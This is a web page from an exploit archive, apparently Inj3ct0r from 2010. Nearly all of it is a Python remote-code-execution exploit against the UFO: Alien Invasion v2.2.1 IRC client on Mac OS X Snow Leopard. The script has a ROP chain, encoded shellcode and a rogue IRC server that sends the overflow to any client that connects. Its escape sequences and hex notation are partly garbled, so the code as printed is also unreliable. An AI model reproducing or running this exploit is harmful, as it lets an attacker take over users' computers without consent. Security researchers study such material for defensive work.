UFO: Alien Invasion v2.2.1 IRC Client Remote Code Execution Snow Leopard
<!DOCTYPE HTML PUBLIC ‘-//W3C//DTD HTML 4.01 Transitional//EN’><html><head><meta http-equiv=’Content-Type’ content=’text/html; charset=windows-1251′><title>UFO: Alien Invasion v2.2.1 IRC Client Remote Code Execution Snow Leopard</title><link rel=’shortcut icon’ href=’/favicon.ico’ type=’image/x-icon’><link rel=’alternate’ type=’application/rss+xml’ title=’Inj3ct0r RSS’ href=’/rss’></head><body><pre>==============================================================================
UFO: Alien Invasion v2.2.1 IRC Client Remote Code Execution Snow Leopard (ROP)
==============================================================================
#!/usr/bin/python
# UFO: Alien Invasion v2.2.1 IRC Client Remote Code Execution – MacOSX
# OS X Snow Leopard: d1dn0t
# OS X Leopard: dookie
# Windows PoC: Jason Geffner http://www.exploit-db.com/exploits/14013
import sys, socket, struct
WRITEABLE = 0×8fe66448
STRCPY=0×8fe2db10
shellcode = ("xdbxc3xd9×74x24xf4xbbxf3xbdx8dx7cx33xc9×5dxb1"
"x27×31x5dx18×03x5dx18×83xc5xf7×5fx78×4dx37×06"
"xd3xeexe7×79x84xbcxb7×1bxe9xc1xb8×59x8fxc1xc6"
"x5dxf9×04x94×0fxabxe0×18xb2×5axadx91×51x36×5d"
"xf2xc3×95xedx9cx26×99x7cx3bxebxccxd2×73x61×3c"
"x52×01x28xecx01xb3×86xa0xb8xf6xa7xb3×90x81×6f"
"x02xc2×12x84×64xb7×47x0cx34×87x3dx7fx3ax95×82"
"xfcxc0×59x71xf2×06x9ex29xa4×38x4ex79×7fx74xee"
"xe9×10xbaxc2×7cx18×73x5exb3×9axf0xa5×4bxefxe1"
"x68×8bx5fx66xa4×24x13×1exd2×15xb1xb7×4cxe0xd6"
"x18xc1xa1×48x29xdax88xe9×78xddx42×63x99×8dx32"
"x20×0ex7ex02xc1×63xfex53×0ex2bxafxd3×43x4cx45")
# ==================== Put stack pointer into EAX/EDX ====================
ROP = struct.pack(‘<I’,0×8fe2b3d4) # POP – RET Insturction – Pop’s over the writeable value below
ROP += struct.pack(‘<I’,WRITEABLE) # Required Writeable address here for exploit to work
ROP += struct.pack(‘<I’,0×8fe2fb63) # pop eax # ret
ROP += struct.pack(‘<I’,WRITEABLE) # Pop writeable address into eax for instructions below
ROP += struct.pack(‘<I’,0×8fe2fb58) # push esp # and al,0×4 # mov [eax+0x28],edx # mov edx,[esp] # mov [eax],edx # pop eax # ret
# ==================== Jump Over Parameters below ====================
ROP += struct.pack(‘<I’,0xffff1d6b) # add esp,byte +0×1c # pop ebp # ret
# ==================== strcpy call ====================
ROP += struct.pack(‘<I’,STRCPY) # use strcpy to copy shellcode from stack to heap
ROP += struct.pack(‘<I’,0×8fe2dfd1) # POP – POP – RET over strcpy params
ROP += struct.pack(‘<I’,WRITEABLE) # Dst Param for strcpy
ROP += ‘EEEE’ # Src Param for strcpy
ROP += struct.pack(‘<I’,WRITEABLE) # Move execution to where we moved our shell
ROP += ‘C’*12 # Padding
# ==================== Craft Parameter 2 ====================
# Need to inc EAX or EDX to point to shell code
# Store 0×40 in ECX
ROP += struct.pack(‘<I’,0×8fe2dae4) # mov ecx,[esp+0x4] # add eax,edx # sub eax,ecx # ret
ROP += struct.pack(‘<I’,0×8fe2b3d4) # POP – RET Insturction – Pop’s over the value below
ROP += struct.pack(‘<I’,0xffffffff) # Value to store in ecx
ROP += struct.pack(‘<I’,0×8fe0c0c7) # inc ecx # xor al,0xc9
ROP += struct.pack(‘<I’,0×8fe0c0c7) # inc ecx # xor al,0xc9
ROP += struct.pack(‘<I’,0×8fe24b3c) # add ecx,ecx # ret
ROP += struct.pack(‘<I’,0×8fe24b3c) # add ecx,ecx # ret
ROP += struct.pack(‘<I’,0×8fe24b3c) # add ecx,ecx # ret
ROP += struct.pack(‘<I’,0×8fe24b3c) # add ecx,ecx # ret
# Replace stack pointer back into eax as it was trashed
ROP += struct.pack(‘<I’,0×8fe2c71d) # mov eax,edx # ret
# Add offset to paramter
ROP += struct.pack(‘<I’,0×8fe2def4) # add eax,ecx # ret
# Swap over so we can work on fresh copy of saved ESP
ROP += struct.pack(‘<I’,0×8fe0e32d) # xchg eax,edx
# Double ECX a few more times to point to our nop sled/shell code
ROP += struct.pack(‘<I’,0×8fe0c0c7) # inc ecx # xor al,0xc9
ROP += struct.pack(‘<I’,0×8fe0c0c7) # inc ecx # xor al,0xc9
ROP += struct.pack(‘<I’,0×8fe24b3c) # add ecx,ecx # ret
ROP += struct.pack(‘<I’,0×8fe24b3c) # add ecx,ecx # ret
ROP += struct.pack(‘<I’,0×8fe24b3c) # add ecx,ecx # ret
# Add offset to shellcode
ROP += struct.pack(‘<I’,0×8fe2def4) # add eax,ecx # ret
# Swap back
ROP += struct.pack(‘<I’,0×8fe0e32d) # xchg eax,edx
# Copy parameter to placeholder
ROP += struct.pack(‘<I’,0×8fe2fb61) # mov [eax],edx # pop eax # ret
ROP += ‘G’*4 # junk
# ==================== Call strcpy function ====================
# Set our Stack pointer back to original value
ROP += struct.pack(‘<I’,0×8fe0e32d) # xchg eax,edx
ROP += struct.pack(‘<I’,0×8fe2daea) # sub eax,ecx # ret
# Return execution to our strdup call above
ROP += struct.pack(‘<I’,0×8fe0b1c2) # xchg eax,ebp # inc ebp # ret
ROP += struct.pack(‘<I’,0×8fe2b6a5) # dec ebp # ret
ROP += struct.pack(‘<I’,0xffff01f3) # mov esp,ebp # pop ebp # ret
ROP += ‘G’*4 # junk
# ==================== Call Exploit code from heap ====================
sploit = "001 :"
sploit += "x41" * 528
sploit += ROP
sploit += ‘x90′ * 10
sploit += shellcode
sploit += "x0dx0a"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((”, 6667))
s.listen(1)
print ("[*] Listening on port 6667.")
print ("[*] Have someone connect to you.")
print ("[*] Type [control]-c to exit.")
conn, addr = s.accept()
print ‘[*] Received connection from: ‘, addr
conn.send(sploit)
conn.close
# <a href=’http://inj3ct0r.com/’>Inj3ct0r.com</a> [2010-07-08]</pre><script type=’text/javascript’>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src=’" + gaJsHost + "google-analytics.com/ga.js’ type=’text/javascript’%3E%3C/script%3E"));</script><script type=’text/javascript’>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
Source: http://inj3ct0r.com/exploits/13239
Leave a Reply